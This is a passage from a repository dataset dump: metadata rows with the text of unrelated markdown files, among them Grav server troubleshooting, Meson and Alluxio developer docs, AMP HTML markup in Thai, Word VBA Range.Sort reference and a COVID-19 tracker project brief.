- [Tâche 1 : Créer une nouvelle application Windows Presentation Foundation](task-1-create-a-new-wpf-app.md)
- [Tâche 3 : Créer les volets Toolbox et PropertyGrid](task-3-create-the-toolbox-and-propertygrid-panes.md)
| 53.407692 | 445 | 0.711508 | fra_Latn | 0.914166 |
e047d402b61fdf793b8c80c7421973d28fb53fc7 | 1,538 | md | Markdown | docs/web/mandarine/mandarine-security/authentication-userdetailsservice.md | Fusselwurm/mandarinets | 348b3ade07bce3b0b2aadd85066ea21b9e808087 | [
"MIT"
] | 255 | 2020-05-11T22:34:06.000Z | 2022-03-29T16:33:34.000Z | docs/web/mandarine/mandarine-security/authentication-userdetailsservice.md | Fusselwurm/mandarinets | 348b3ade07bce3b0b2aadd85066ea21b9e808087 | [
"MIT"
] | 132 | 2020-05-22T16:45:13.000Z | 2022-02-28T16:39:41.000Z | docs/web/mandarine/mandarine-security/authentication-userdetailsservice.md | Fusselwurm/mandarinets | 348b3ade07bce3b0b2aadd85066ea21b9e808087 | [
"MIT"
] | 24 | 2020-05-16T18:48:47.000Z | 2022-03-19T20:31:51.000Z | # User Details Service
---------
## Overview
The User Details Service is a Mandarine-powered component (_preferably annotated with `@Service`_) which has a single responsability. This single responsability is to fetch a specific user from a collection of `Mandarine.Types.UserDetails`.
An User Details Service must implement `Mandarine.Types.UserDetailsService` otherwise it will result in failure at MCT (Mandarine Compile Time).
## `Mandarine.Types.UserDetailsService` interface
```typescript
export interface UserDetailsService {
/**
* Locates the user based on the username.
*
* @param username the username identifying the user whose data is required.
*
* @returns A user record with an implementation of UserDetails
*
* @throws MandarineSecurityException if no user was found.
*/
loadUserByUsername: (username: string) => Mandarine.Types.UserDetails;
}
```
- loadUserByUsername
- Fetches an user based on an username from a collection that implements `Mandarine.Types.UserDetails`.
## Basic Usage
```typescript
import { Service, Mandarine } from "https://deno.land/x/[email protected]/mod.ts";
@Service()
export class UserDetailsServiceImplementation implements Mandarine.Security.Auth.UserDetailsService {
public users: Array<Mandarine.Types.UserDetails> = new Array<Mandarine.Types.UserDetails>();
public loadUserByUsername(username: string) {
return this.users.find((item: Mandarine.Types.UserDetails) => item.username === username);
}
}
``` | 34.177778 | 242 | 0.742523 | eng_Latn | 0.868529 |
e047d792fc69188c71e9a35518a4d81649a59d42 | 4,627 | md | Markdown | pages/11.troubleshooting/01.page-not-found/docs.md | weeyin83/grav-learn | 8cb6e17ed236930108e3fbf93ca0e55b0e4ea72d | [
"MIT"
] | 1 | 2020-06-02T07:06:23.000Z | 2020-06-02T07:06:23.000Z | pages/11.troubleshooting/01.page-not-found/docs.md | weeyin83/grav-learn | 8cb6e17ed236930108e3fbf93ca0e55b0e4ea72d | [
"MIT"
] | null | null | null | pages/11.troubleshooting/01.page-not-found/docs.md | weeyin83/grav-learn | 8cb6e17ed236930108e3fbf93ca0e55b0e4ea72d | [
"MIT"
] | 1 | 2021-01-20T08:14:35.000Z | 2021-01-20T08:14:35.000Z | ---
title: 404 Not Found
taxonomy:
category: docs
---
There are a couple of reasons you might receive a **Not Found** error, and they are each caused by different factors.
 {.bordered}
!! The examples below are for the Apache Web Server which is the most common server software used.
### IIS use of .htaccess file
After adding URL Rewrite to the IIS server using the Web Platform Installer, restart the IIS server. Go to the management interface, IIS, double-click on URL Rewrite, under Inbound Rules, click on Import Rules, under Rules to Import, browse to the Configuration file, choosing the .htaccess file in the root, and then click on Import. Restart the IIS server. Access Grav now.
### Missing .htaccess File
The first thing to check is if you have the provided `.htaccess` file at the root of your Grav installation. Because this is a **hidden** file, you won't normally see this in your explorer or finder windows. If you have extracted Grav then **selected** and **moved** or **copied** the files, you may well have left this very important file behind.
It is **strongly advised** to unzip Grav and move the **entire folder** into place, then simply rename the folder. This will ensure all the files retain their proper positions.
### AllowOverride All
In order for the Grav-provided `.htaccess` to be able to set the rewrite rules required for routing to work properly, Apache needs to first read the file. When your `<Directory>` or `<VirtualHost>` directive is setup with `AllowOverride None`, the `.htaccess` file is completely ignored. The simplest solution is to change this to `AllowOverride All`
where RewriteRule is used, **FollowSymLinks** or **SymLinksIfOwnerMatch** needs to be set in Options directive. Simply add on the same line '+FollowSymlinks' after 'Options'
More details on `AllowOverride` and all the possible configuration options can be found in the [Apache Documentation](http://httpd.apache.org/docs/2.4/mod/core.html#allowoverride).
### RewriteBase Issue
If the homepage of your Grav site loads, but **any other page** displays this very rough _Apache-style_ error, then the most likely cause is that there is a problem with your `.htaccess` file.
The default `.htaccess` that comes bundled with Grav works fine out-of-the-box in most cases. However, there are certain setups involving virtual hosts where the file system does not match the virtual hosting setup directly. In these cases you must configure the `RewriteBase` option in the `.htaccess` to point to the correct path.
There is a short explanation of this in the `.htaccess` file itself:
```
##
# If you are getting 404 errors on subpages, you may have to uncomment the RewriteBase entry
# You should change the '/' to your appropriate subfolder. For example if you have
# your Grav install at the root of your site '/' should work, else it might be something
# along the lines of: RewriteBase /<your_sub_folder>
##
# RewriteBase /
```
Simply remove the `#` before the `RewriteBase /` directive to uncomment it, and adjust the path to match your server environment.
We've included additional information to help you locate and troubleshoot your `.htaccess` file in our [htaccess guide](../htaccess).
### Missing Rewrite Modules
Some webserver packages (I'm looking at your EasyPHP and WAMP!) do not come with the Apache **rewrite** module enabled by default. They usually can be enabled from the configuration settings for Apache, or you can do so manually via the `httpd.conf` by uncommenting this line (or something similar) so they are loaded by Apache:
```
#LoadModule rewrite_module modules/mod_rewrite.so
```
Then restart your Apache server.
### Grav Error 404 Page
 {.bordered}
If you receive a _Grav-style_ error saying **Error 404** then your `.htaccess` is functioning correctly, but you're trying to reach a page that Grav cannot find.
The most common cause of this is simply that the page has been moved or renamed. Another thing to check is if the page has a `slug` set in the page YAML headers. This overrides the explicit folder name that is used by default to construct the URL.
Another cause could be your page is **not routable**. The routable option for a page can be set in the [page headers](../../content/headers).
### 404 Page Not Found on Nginx
If your site is in a subfolder, make sure your nginx.conf location points to that subfolder. Grav's [sample nginx.conf](https://github.com/getgrav/grav/blob/master/webserver-configs/nginx.conf) has a comment in the code that explains how.
| 61.693333 | 375 | 0.7614 | eng_Latn | 0.99888 |
e048452ad39ee51a5227044379391c6befedecb1 | 543 | md | Markdown | README.md | jamesabel/hashy | b66eaee68524dc8cd7f0141a8a033fe786535322 | [
"MIT"
] | null | null | null | README.md | jamesabel/hashy | b66eaee68524dc8cd7f0141a8a033fe786535322 | [
"MIT"
] | null | null | null | README.md | jamesabel/hashy | b66eaee68524dc8cd7f0141a8a033fe786535322 | [
"MIT"
] | null | null | null | # hashy
Another hash library.
hashy provides an md5, sha256 or sha512 for string, file, dict, list and set.
String and file hashes are conventional and can be compared to other implementations. For example
you can go to an online hash calculator for "a" and get the same hash as hashy generates.
Hashes for complex data types like dict, list and set are specific to hashy.
# Example
```
from hashy import get_string_sha256
print(get_string_sha256("a"))
# prints
# ca978112ca1bbdcafac231b39a23dc4da786eff8147c4e72b9807785afee48bb
```
| 22.625 | 97 | 0.78453 | eng_Latn | 0.997182 |
e0497b2695bb03dc5c7711dfe949bd1f16b0ba11 | 4,454 | md | Markdown | _get_started/create/basic_markup.th.md | adamcbrewer/amp-docs | 9916e4b0cd10068ebbd4ea1dba5f0cc363f68b03 | [
"Apache-2.0"
] | null | null | null | _get_started/create/basic_markup.th.md | adamcbrewer/amp-docs | 9916e4b0cd10068ebbd4ea1dba5f0cc363f68b03 | [
"Apache-2.0"
] | null | null | null | _get_started/create/basic_markup.th.md | adamcbrewer/amp-docs | 9916e4b0cd10068ebbd4ea1dba5f0cc363f68b03 | [
"Apache-2.0"
] | null | null | null | ---
layout: page
title: สร้างหน้า AMP HTML
order: 0
locale: th
---
มาร์กอัปต่อไปนี้คือจุดเริ่มต้นหรือต้นแบบที่ดี
ให้คัดลอกและบันทึกลงในไฟล์ที่มีส่วนขยาย .html
{% highlight html %}
<!doctype html>
<html amp lang="en">
<head>
<meta charset="utf-8">
<title>Hello, AMPs</title>
<link rel="canonical" href="http://example.ampproject.org/article-metadata.html" />
<meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">
<script type="application/ld+json">
{
"@context": "http://schema.org",
"@type": "NewsArticle",
"headline": "Open-source framework for publishing content",
"datePublished": "2015-10-07T12:02:41Z",
"image": [
"logo.jpg"
]
}
</script>
<style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
<script async src="https://cdn.ampproject.org/v0.js"></script>
</head>
<body>
<h1>Welcome to the mobile web</h1>
</body>
</html>
{% endhighlight %}
ส่วนเนื้อความในตัวอย่างจะค่อนข้างตรงไปตรงมา แต่มีการเพิ่มโค้ดหลายอย่างไว้ที่ส่วนหัวของหน้าซึ่งคุณอาจไม่ทันได้สังเกต ลองมาดูมาร์กอัปที่จำเป็นกัน
## มาร์กอัปที่จำเป็น
เอกสาร AMP HTML จะต้อง:
- เริ่มต้นด้วย doctype `<!doctype html>`
- มีแท็ก `<html ⚡>` ระดับบนสุด (สามารถใช้ `<html amp>` ได้เช่นกัน)
- มีแท็ก `<head>` และ `<body>` (มีหรือไม่ก็ได้ใน HTML)
- มีแท็ก `<link rel="canonical" href="$SOME_URL" />` อยู่ภายในส่วนหัวที่นำไปยังเอกสาร AMP HTML เวอร์ชัน HTML ปกติหรือไปยังหน้านั้นเองในกรณีที่ไม่มีเวอร์ชัน HTML
- มีแท็ก `<meta charset="utf-8">` เป็นรายการย่อยแรกของแท็กส่วนหัว
- มีแท็ก `<meta name="viewport" content="width=device-width,minimum-scale=1">` อยู่ในแท็กส่วนหัว โดยแนะนำให้ใส่ initial-scale=1 ไว้ด้วย
- มีแท็ก `<script async src="https://cdn.ampproject.org/v0.js"></script>` เป็นอิลิเมนต์สุดท้ายในส่วนหัว (ซึ่งรวมถึงและการโหลดไลบรารี AMP JS)
- มีรายการต่อไปนี้ในแท็ก `<head>`:
`<style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>`
## เมตาดาตาที่จะมีหรือไม่ก็ได้
นอกเหนือจากข้อกำหนดโดยทั่วไป ตัวอย่างของเรายังมีการใช้ข้อกำหนด Schema.org ในส่วนหัว ซึ่งไม่ใช่ข้อกำหนดที่จำเป็นต้องใช้สำหรับ AMP แต่จำเป็นต้องมีเพื่อให้สามารถเผยแพร่เนื้อหาของคุณไปยังปลายทางที่ระบุ เช่น ใน[การสาธิตการแสดงข่าวแบบหมุนใน Google Search (ให้ลองใช้บนโทรศัพท์ของคุณ)](https://g.co/ampdemo)
หากต้องการเรียนรู้เพิ่มเติมเกี่ยวกับเมตาดาตาทั้งหมดที่คุณจำเป็นต้องใช้ในที่ต่างๆ เช่น Twitter [ให้ดูตัวอย่างของเรา](https://github.com/ampproject/amphtml/tree/master/examples/metadata-examples) หากต้องการเรียนรู้เฉพาะเจาะจงเกี่ยวกับ AMP ใน Google Search ดู[การแสดงเรื่องเด่นด้วย AMP](https://developers.google.com/structured-data/carousels/top-stories)
<hr>
ข่าวดี! คุณได้ดำเนินการต่างๆ ที่จำเป็นสำหรับการสร้าง AMP หน้าแรกแล้ว อย่างไรก็ตาม ยังมีเนื้อหาในส่วนเนื้อความไม่มากนัก ในส่วนต่อไป เราจะกล่าวถึงวิธีการเพิ่มรายการพื้นฐาน เช่น รูปภาพ อิลิเมนต์ AMP แบบกำหนดเอง การจัดรูปแบบหน้าเว็บของคุณ และการจัดเค้าโครงแบบอินเทอร์แอคทีฟ
{% include button.html title="ไปยังขั้นตอนที่ 2" link="/docs/get_started/create/include_image.th.html" %}
| 67.484848 | 769 | 0.713965 | tha_Thai | 0.459422 |
e049e82c1b3a7eea296bc3a31eee7075ac25083c | 1,835 | md | Markdown | docs/markdown/Adding-arguments.md | kvaghel1/meson | 506fbafed53c2f98986dfeaa5677cb6813b6e182 | [
"Apache-2.0"
] | null | null | null | docs/markdown/Adding-arguments.md | kvaghel1/meson | 506fbafed53c2f98986dfeaa5677cb6813b6e182 | [
"Apache-2.0"
] | null | null | null | docs/markdown/Adding-arguments.md | kvaghel1/meson | 506fbafed53c2f98986dfeaa5677cb6813b6e182 | [
"Apache-2.0"
] | null | null | null | ---
short-description: Adding compiler arguments
...
# Adding arguments
Often you need to specify extra compiler arguments. Meson provides two different ways to achieve this: global arguments and per-target arguments.
Global arguments
--
Global compiler arguments are set with the following command. As an example you could do this.
```meson
add_global_arguments('-DFOO=bar', language : 'c')
```
This makes Meson add the define to all C compilations. Usually you would use this setting for flags for global settings. Note that for setting the C/C++ language standard (the `-std=c99` argument in GCC), you would probably want to use a default option of the `project()` function. For details see the [reference manual](Reference manual).
Global arguments have certain limitations. They all have to be defined before any build targets are specified. This ensures that the global flags are the same for every single source file built in the entire project with one exception. Compilation tests that are run as part of your project configuration do not use these flags. The reason for that is that you may need to run a test compile with and without a given flag to determine your build setup. For this reason tests do not use these global arguments.
You should set only the most essential flags with this setting, you should *not* set debug or optimization flags. Instead they should be specified by selecting an appropriate build type.
Per target arguments
--
Per target arguments are just as simple to define.
```meson
executable('prog', 'prog.cc', cpp_args : '-DCPPTHING')
```
Here we create a C++ executable with an extra argument that is used during compilation but not for linking.
Specifying extra linker arguments is done in the same way:
```meson
executable('prog', 'prog.cc', link_args : '-Wl,--linker-option')
```
| 45.875 | 509 | 0.774387 | eng_Latn | 0.999297 |
e04a45dd0718c92e60fc7484aaa6021bbc77fcb0 | 5,299 | md | Markdown | docs/en/DevelopingUFSExtensions.md | shaileshcheke/alluxio | 5b143d63aa397a752ce64ae0f24de677327a732d | [
"Apache-2.0"
] | 2 | 2018-11-14T10:38:41.000Z | 2019-03-01T12:57:22.000Z | docs/en/DevelopingUFSExtensions.md | shaileshcheke/alluxio | 5b143d63aa397a752ce64ae0f24de677327a732d | [
"Apache-2.0"
] | 1 | 2016-02-18T09:58:14.000Z | 2016-02-18T10:07:39.000Z | docs/en/DevelopingUFSExtensions.md | shaileshcheke/alluxio | 5b143d63aa397a752ce64ae0f24de677327a732d | [
"Apache-2.0"
] | null | null | null | ---
layout: global
group: Resources
title: Developing Under Storage Extensions
---
* Table of Contents
{:toc}
This page is intended for developers of under storage extensions. Please look at [managing
extensions](UFSExtensions.html) for a guide to using existing extensions.
Under storage extensions are built as JARs and included at a specific extensions location to be
picked up by core Alluxio. This page describes the mechanics of how extensions in Alluxio work, and
provides detailed instructions for developing an under storage extension. Extensions provide a
framework to enable more under storages to work with Alluxio and makes it convenient to develop
modules not already supported by Alluxio.
# How it Works
## Service Discovery
Extension JARs are loaded dynamically at runtime by Alluxio servers, which enables Alluxio to talk
to new under storage systems without requiring a restart. Alluxio servers use Java
[ServiceLoader](https://docs.oracle.com/javase/7/docs/api/java/util/ServiceLoader.html) to discover
implementations of the under storage API. Providers include implementations of the
`alluxio.underfs.UnderFileSystemFactory` interface. The implementation is advertised by including a
text file in `META_INF/services` with a single line pointing to the class implementing the said
interface.
## Dependency Management
Implementors are required to include transitive dependencies in their extension JARs. Alluxio performs
isolated classloading for each extension JARs to avoid dependency conflicts between Alluxio servers and
extensions.
# Implementing an Under Storage Extension
Building a new under storage connector involves:
- Implementing the required under storage interface
- Declaring the service implementation
- Bundling up the implementation and transitive dependencies in an uber JAR
A reference implementation can be found in the [alluxio-extensions](https://github.com/Alluxio
/alluxio-extensions/tree/master/underfs/tutorial) repository. In the rest of this section we
describe the steps involved in writing a new under storage extension. The sample project, called
`DummyUnderFileSystem`, uses maven as the build and dependency management tool, and forwards all
operations to a local filesystem.
## Implement the Under Storage Interface
The [HDFS Submodule](https://github.com/alluxio/alluxio/tree/master/underfs/hdfs) and [S3A Submodule](https://github.com/alluxio/alluxio/tree/master/underfs/s3a) are two good examples of how to enable a storage system to serve as Alluxio's underlying storage.
Step 1: Implement the interface `UnderFileSystem`
The `UnderFileSystem` interface is defined in the module `org.alluxio:alluxio-core-common`. Choose
to extend either `BaseUnderFileSystem` or `ObjectUnderFileSystem` to implement the `UnderFileSystem`
interface. `ObjectUnderFileSystem` is suitable for connecting to object storage and abstracts away
mapping file system operations to an object store.
```java
public class DummyUnderFileSystem extends BaseUnderFileSystem {
// Implement filesystem operations
...
}
```
or,
```java
public class DummyUnderFileSystem extends ObjectUnderFileSystem {
// Implement object store operations
...
}
```
Step 2: Implement the interface `UnderFileSystemFactory`
The under storage factory determines defines which paths the `UnderFileSystem` implementation
supports, and how to create the `UnderFileSystem` implementation.
```java
public class DummyUnderFileSystemFactory implements UnderFileSystemFactory {
...
@Override
public UnderFileSystem create(String path, UnderFileSystemConfiguration conf) {
// Create the under storage instance
}
@Override
public boolean supportsPath(String path) {
// Choose which schemes to support, e.g., dummy://
}
}
```
## Declare the Service
Create a file at `src/main/resources/META_INF/services/alluxio.underfs.UnderFileSystemFactory`
advertising the implemented `UnderFileSystemFactory` to the ServiceLoader.
```
alluxio.underfs.dummy.DummyUnderFileSystemFactory
```
## Build
Include all transitive dependencies of the extension project in the built JAR using either
`maven-shade-plugin` or `maven-assembly`.
In addition, to avoid collisions specify scope for the dependency `alluxio-core-common` as
`provided`. The maven definition would look like:
```xml
<dependencies>
<!-- Core Alluxio dependencies -->
<dependency>
<groupId>org.alluxio</groupId>
<artifactId>alluxio-core-common</artifactId>
<scope>provided</scope>
</dependency>
...
</dependencies>
```
## Test
Extend `AbstractUnderFileSystemContractTest` to test that the defined `UnderFileSystem` adheres to
the contract between Alluxio and an under storage module. Look at the reference implementation to
include parameters such as the working directory for the test.
```java
public final class DummyUnderFileSystemContractTest extends AbstractUnderFileSystemContractTest {
...
}
```
Congratulations! You have developed a new under storage extension to Alluxio. Let the community
know by submitting a pull request to the Alluxio
[repository](https://github.com/Alluxio/alluxio/tree/master/docs/en/UFSExtensions.md) to edit the
list of extensions section on the [documentation page](UFSExtensions.html).
| 36.798611 | 259 | 0.792791 | eng_Latn | 0.984696 |
e04b12080661182d4bd2a97b597f1acaf383f29f | 54 | md | Markdown | README.md | mhstnsc/zio-reproducer | d92c6e3d906f24b661ae95cdbd0bcc580bd3e358 | [
"Apache-2.0"
] | null | null | null | README.md | mhstnsc/zio-reproducer | d92c6e3d906f24b661ae95cdbd0bcc580bd3e358 | [
"Apache-2.0"
] | null | null | null | README.md | mhstnsc/zio-reproducer | d92c6e3d906f24b661ae95cdbd0bcc580bd3e358 | [
"Apache-2.0"
] | null | null | null | # zio-reproducer
Just a project to preset reproducers
| 18 | 36 | 0.814815 | eng_Latn | 0.991292 |
e04b24b96d45a73f7517d04b2ea8c9e6f2d89ad5 | 425 | md | Markdown | _site/shorts/2022-04-20-oclif-the-open-cli-framework.md | planetoftheweb/raybo.org | fbc2226bd8f47ebb9760f69186fa52284e0112de | [
"MIT"
] | null | null | null | _site/shorts/2022-04-20-oclif-the-open-cli-framework.md | planetoftheweb/raybo.org | fbc2226bd8f47ebb9760f69186fa52284e0112de | [
"MIT"
] | null | null | null | _site/shorts/2022-04-20-oclif-the-open-cli-framework.md | planetoftheweb/raybo.org | fbc2226bd8f47ebb9760f69186fa52284e0112de | [
"MIT"
] | null | null | null | ---
layout: post.njk
title: "OCLIF CLI Framework"
summary: "I love CLIs...or Command Line Interfaces, so I've been really interested in this framework that can help you set them up a bit quicker. It lets you use Node so you can work with JavaScript instead oof something like Bash to work on your CLI."
thumb: "/images/shorts/2022-04-20_19-21-29.png"
links:
- website: "https://oclif.io/"
category:
tags:
- external
---
| 35.416667 | 253 | 0.731765 | eng_Latn | 0.979313 |
e04b46f4f04142382b50bb0859d83792a2b598a1 | 5,088 | md | Markdown | VBA/Word-VBA/articles/range-sort-method-word.md | oloier/VBA-content | 6b3cb5769808b7e18e3aff55a26363ebe78e4578 | [
"CC-BY-4.0",
"MIT"
] | 584 | 2015-09-01T10:09:09.000Z | 2022-03-30T15:47:20.000Z | VBA/Word-VBA/articles/range-sort-method-word.md | oloier/VBA-content | 6b3cb5769808b7e18e3aff55a26363ebe78e4578 | [
"CC-BY-4.0",
"MIT"
] | 585 | 2015-08-28T20:20:03.000Z | 2018-08-31T03:09:51.000Z | VBA/Word-VBA/articles/range-sort-method-word.md | oloier/VBA-content | 6b3cb5769808b7e18e3aff55a26363ebe78e4578 | [
"CC-BY-4.0",
"MIT"
] | 590 | 2015-09-01T10:09:09.000Z | 2021-09-27T08:02:27.000Z | ---
title: Range.Sort Method (Word)
keywords: vbawd10.chm157155812
f1_keywords:
- vbawd10.chm157155812
ms.prod: word
api_name:
- Word.Range.Sort
ms.assetid: 2030f99e-0307-d2b7-9e14-1d0888f3fda6
ms.date: 06/08/2017
---
# Range.Sort Method (Word)
Sorts the paragraphs in the specified range.
## Syntax
_expression_ . **Sort**( **_ExcludeHeader_** , **_FieldNumber_** , **_SortFieldType_** , **_SortOrder_** , **_FieldNumber2_** , **_SortFieldType2_** , **_SortOrder2_** , **_FieldNumber3_** , **_SortFieldType3_** , **_SortOrder3_** , **_SortColumn_** , **_Separator_** , **_CaseSensitive_** , **_BidiSort_** , **_IgnoreThe_** , **_IgnoreKashida_** , **_IgnoreDiacritics_** , **_IgnoreHe_** , **_LanguageID_** )
_expression_ Required. A variable that represents a **[Range](range-object-word.md)** object.
### Parameters
|**Name**|**Required/Optional**|**Data Type**|**Description**|
|:-----|:-----|:-----|:-----|
| _ExcludeHeader_|Optional| **Variant**| **True** to exclude the first row or paragraph header from the sort operation. The default value is **False** .|
| _FieldNumber_|Optional| **Variant**|The fields by which to sort. Microsoft Word sorts by FieldNumber, then by FieldNumber2, and then by FieldNumber3.|
| _SortFieldType_|Optional| **Variant**|The respective sort types for FieldNumber. Can be one of the **WdSortFieldType** constants. The default value is **wdSortFieldAlphanumeric** . Some of these constants may not be available to you, depending on the language support (U.S. English, for example) that you have selected or installed.|
| _SortOrder_|Optional| **Variant**|The sorting order to use when sorting FieldNumber. Can be any **WdSortOrder** constant.|
| _FieldNumber2_|Optional| **Variant**|The fields by which to sort.|
| _SortFieldType2_|Optional| **Variant**|The respective sort types for FieldNumber2. Can be one of the **WdSortFieldType** constants. The default value is **wdSortFieldAlphanumeric** . Some of these constants may not be available to you, depending on the language support (U.S. English, for example) that you have selected or installed.|
| _SortOrder2_|Optional| **Variant**|The sorting order to use when sorting FieldNumber2. Can be any **WdSortOrder** constant.|
| _FieldNumber3_|Optional| **Variant**|The fields by which to sort.|
| _SortFieldType3_|Required||Some of these constants may not be available to you, depending on the language support (U.S. English, for example) that you?ve selected or installed. The default value is **wdSortFieldAlphanumeric** . Some of these constants may not be available to you, depending on the language support (U.S. English, for example) that you have selected or installed.|
| _SortOrder3_|Optional| **Variant**|The sorting order to use when sorting FieldNumber3. Can be any **WdSortOrder** constant.|
| _SortColumn_|Optional| **Variant**| **True** to sort only the column specified by the **Range** object.|
| _Separator_|Optional| **Variant**|The type of field separator. Can be one of the **WdSortSeparator** constants.|
| _CaseSensitive_|Optional| **Variant**| **True** to sort with case sensitivity. The default value is **False** .|
| _BidiSort_|Optional| **Variant**| **True** to sort based on right-to-left language rules. This argument may not be available to you, depending on the language support (U.S. English, for example) that you?ve selected or installed.|
| _IgnoreThe_|Optional| **Variant**| **True** to ignore the Arabic character alef lam when sorting right-to-left language text. This argument may not be available to you, depending on the language support (U.S. English, for example) that you?ve selected or installed.|
| _IgnoreKashida_|Optional| **Variant**| **True** to ignore kashidas when sorting right-to-left language text. This argument may not be available to you, depending on the language support (U.S. English, for example) that you?ve selected or installed.|
| _IgnoreDiacritics_|Optional| **Variant**| **True** to ignore bidirectional control characters when sorting right-to-left language text. This argument may not be available to you, depending on the language support (U.S. English, for example) that you?ve selected or installed.|
| _IgnoreHe_|Optional| **Variant**| **True** to ignore the Hebrew character he when sorting right-to-left language text. This argument may not be available to you, depending on the language support (U.S. English, for example) that you?ve selected or installed.|
| _LanguageID_|Optional| **Variant**|Specifies the sorting language. Can be one of the **WdLanguageID** constants. Refer to the Object Browser for a list of the **WdLanguageID** constants.|
## Example
This example inserts three lines of text into a new document and then sorts the lines in ascending alphanumeric order
```vb
Sub NewParagraphSort()
Dim newDoc As Document
Set newDoc = Documents.Add
newDoc.Content.InsertAfter "pear" &; Chr(13) _
&; "zucchini" &; Chr(13) &; "apple" &; Chr(13)
newDoc.Content.Sort SortOrder:=wdSortOrderAscending
End Sub
```
## See also
#### Concepts
[Range Object](range-object-word.md)
| 66.947368 | 410 | 0.741745 | eng_Latn | 0.970116 |
e04c4e323eaf812b66fca408d515c0ad1bba7afd | 339 | md | Markdown | README.md | ARNhacker/ARNhacker.github.io | 6ba554b47dfce58e7634962a985007f4774e3b83 | [
"MIT"
] | null | null | null | README.md | ARNhacker/ARNhacker.github.io | 6ba554b47dfce58e7634962a985007f4774e3b83 | [
"MIT"
] | null | null | null | README.md | ARNhacker/ARNhacker.github.io | 6ba554b47dfce58e7634962a985007f4774e3b83 | [
"MIT"
] | null | null | null | # [Le-Pen.fr](http://www.le-pen.fr)
## Contribuer
Pour contribuer, forkez ce repo, faites vos modifications, puis envoyez une Pull-Request !
## Copyright and License
Copyright 2013-2016 Blackrock Digital LLC. Code released under the [MIT](https://github.com/BlackrockDigital/startbootstrap-scrolling-nav/blob/gh-pages/LICENSE) license. | 37.666667 | 169 | 0.775811 | kor_Hang | 0.276329 |
e04c77da76edc7fe7bf0e46a150f720ea5630659 | 2,115 | md | Markdown | projects/Week 2 - COVID-19.md | dannylarrea/weekly-projects | ca5cb74edfb2d09ef2d1759823e3922c047e312e | [
"MIT"
] | 425 | 2020-03-09T16:05:37.000Z | 2022-03-30T14:08:22.000Z | projects/Week 2 - COVID-19.md | dannylarrea/weekly-projects | ca5cb74edfb2d09ef2d1759823e3922c047e312e | [
"MIT"
] | 19 | 2020-03-09T16:53:09.000Z | 2020-10-07T05:55:57.000Z | projects/Week 2 - COVID-19.md | dannylarrea/weekly-projects | ca5cb74edfb2d09ef2d1759823e3922c047e312e | [
"MIT"
] | 133 | 2020-03-10T14:40:27.000Z | 2022-03-20T08:05:39.000Z | # COVID-19 Tracker
### *Use this app to spread awareness in your community and encourage safety measures.*
An application where the user can search and see information about the spread of COVID-19
- In order to complete this project you need to use a COVID-19 API (or any other method you prefer) to find and display information.
## User Stories
- [ ] User can see information about COVID-19 wordwide (infected, recovered, dead).
- [ ] User can see information about COVID-19 in a specific country (infected, recovered, dead).
## Bonus features
- [ ] If available, display regional data within a country.
- [ ] Use a map, charts or any other visualization to display information.
## Useful links and resources
- [API 1](https://github.com/mathdroid/covid-19-api)
- [API 2](https://covid2019-api.herokuapp.com/)
## Example projects
- [Example 1](https://www.youtube.com/watch?v=B85s0cjlitE)
- [Example 2](https://www.coronatracker.com/)
- [Example 3](https://www.arcgis.com/apps/opsdashboard/index.html#/bda7594740fd40299423467b48e9ecf6)
## Submissions
- [@CoreChallenge](https://weekly-project-corvid.netlify.com/)
- [@Ameen](https://covid-19-tracker-nine.vercel.app/)
- [@ivanms1](https://covid-tracker-ten.now.sh/)
- [@satsuroki](https://covid-19.guineeapps.com/index.html)
- [@angels7](https://covid19track.netlify.com/)
- [@Rakshit](https://covidtracker-raj.netlify.com/)
- [@revengemiroz](https://sad-poincare-02054d.netlify.com/?fbclid=IwAR0fUuhR4UM3AWu7Lrl5ZH7WljX63X0_3FQ3xkE5DnnEwnlXsEux2AqGRrA)
- [@mbalaji5](http://covid19tracker.atwebpages.com/)
- [@rishabkumar7](https://covid-19.rishabkumar.ga/)
- [@ved08](https://ved08.github.io/COVID-19-info)
- [@santos25](https://santos25.github.io/coronavirustracker)
- [@rishipurwar1](https://covid-2019tracker.netlify.app/)
- [@SanjanaMukherjee](https://sanjana-mukherjee.github.io/Covid19-Tracker/)
- [@SomShekhar](https://covid19-virus-stats.netlify.app/)
- [@gueguet](https://laughing-shannon-23486b.netlify.app/)
- [@Steffan153](https://coronavirus-tracker.surge.sh/)
- [@OscarRavelo](https://oscarravelo.github.io/CovidTracker/)
| 44.0625 | 134 | 0.739953 | yue_Hant | 0.416939 |
e04d68a9f0e0e8396d5620d7a9b776e5f2314ce6 | 629 | md | Markdown | windows.ui.xaml.media/gradientstop_offset.md | angelazhangmsft/winrt-api | 1f92027f2462911960d6be9333b7a86f7b9bf457 | [
"CC-BY-4.0",
"MIT"
] | 199 | 2017-02-09T23:13:51.000Z | 2022-03-28T15:56:12.000Z | windows.ui.xaml.media/gradientstop_offset.md | angelazhangmsft/winrt-api | 1f92027f2462911960d6be9333b7a86f7b9bf457 | [
"CC-BY-4.0",
"MIT"
